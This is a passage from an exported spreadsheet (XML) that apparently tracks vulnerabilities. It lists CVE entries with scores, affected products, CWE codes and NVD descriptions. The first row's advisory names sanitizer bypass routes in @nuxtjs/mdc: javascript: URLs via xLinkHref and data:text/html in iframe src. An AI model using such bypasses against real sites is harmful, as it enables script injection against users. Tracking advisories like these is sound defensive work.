          <t>MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to 0.22.1, @nuxtjs/mdc uses parseMarkdown with allowDangerousHtml enabled by default and relies on validateProps, validateProp, and unsafeLinkPrefix to remove executable URLs from untrusted Markdown. validateProp checks only attributes named href or src, allowing an SVG xlink:href value represented as xLinkHref to retain a javascript: URL that executes in the page origin when selected. The data:text/html denylist entries are also compared against url.protocol, which is only data:, so an iframe src containing data:text/html survives sanitization and executes in an opaque origin when loaded. Plain href javascript: URLs, srcdoc, object, script, and base elements are already blocked, making these two paths specific sibling gaps in the sanitizer. This issue is fixed in version 0.22.1.</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63671</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65415</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with additional validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. A local user may be able to cause unexpected system termination or read kernel memory.</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65415</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69813</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K391" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K394"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394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K395"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395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74909</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>Keycloak provides a policy enforcer to protect applications by matching incoming web requests against defined security policies. A flaw was found where the enforcer fails to correctly normalize web addresses that contain special encoded characters, such as those representing semicolons or directory traversal segments. An authenticated user can use these encoded characters to trick the enforcer into applying a less restrictive security policy than intended, potentially gaining unauthorized access to sensitive administrative or private application endpoints.</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74909</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K397" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81268</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute flows and obtain sensitive information due to insufficient session expiration of API keys after user deactivation.</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81268</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81551</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to arbitrarily write to or delete files on shared storage due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81551</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds read security issue exists in the query planning component of MongoDB Server. An authenticated user with database read and write privileges can trigger the security issue through crafted query operations, causing the server to read memory beyond allocated buffer boundaries. The revealed memory contents may be partially observable through diagnostic query statistics output.</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82291</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>HeyForm before 3.0.0-rc.8 reflects the request Origin header in CORS responses while allowing credentials, enabling cross-origin requests with authentication. Attackers can execute authenticated GraphQL queries from malicious pages visited by logged-in users to access workspaces, projects, forms, submissions, and respondent data, or modify account settings.</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82291</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84516</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Processing a maliciously crafted file may result in unexpected app termination or disclosure of process memory.</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84516</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87036</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87036</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87075</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87075</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89848</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="inlineStr"/>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Quiesce response IRQ before freeing request queue
qla2xxx_delete_qpair() deletes the request queue before the response
queue. qla25xx_delete_req_que() frees the request queue memory
(kfree(req) in qla25xx_free_req_que()), but the response-queue MSI-X is
only released later, in qla25xx_free_rsp_que(). In that window the
response interrupt can still fire, qla2xxx_msix_rsp_q() queues
qpair-&gt;q_work, and qla_do_work() -&gt; qla24xx_process_response_queue()
dereferences the now-freed rsp-&gt;req (LOGINOUT/CT/ELS entries and the
status path), a use-after-free.
The cancel_work_sync() added for the qpair teardown lives in the
response free path, which runs after the request queue is already freed,
so it does not protect rsp-&gt;req.
Release the response-queue interrupt and flush qpair-&gt;q_work before
deleting the request queue, so no late completion can reach the freed
request queue. Clearing have_irq makes the subsequent
qla25xx_free_rsp_que() skip its free_irq(), and the firmware
queue-delete order (request then response) is preserved; the
request-delete mailbox completes on the default vector and is unaffected
by dropping the qpair response interrupt early.</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89848</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89861</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>8.1</v>
      </c>
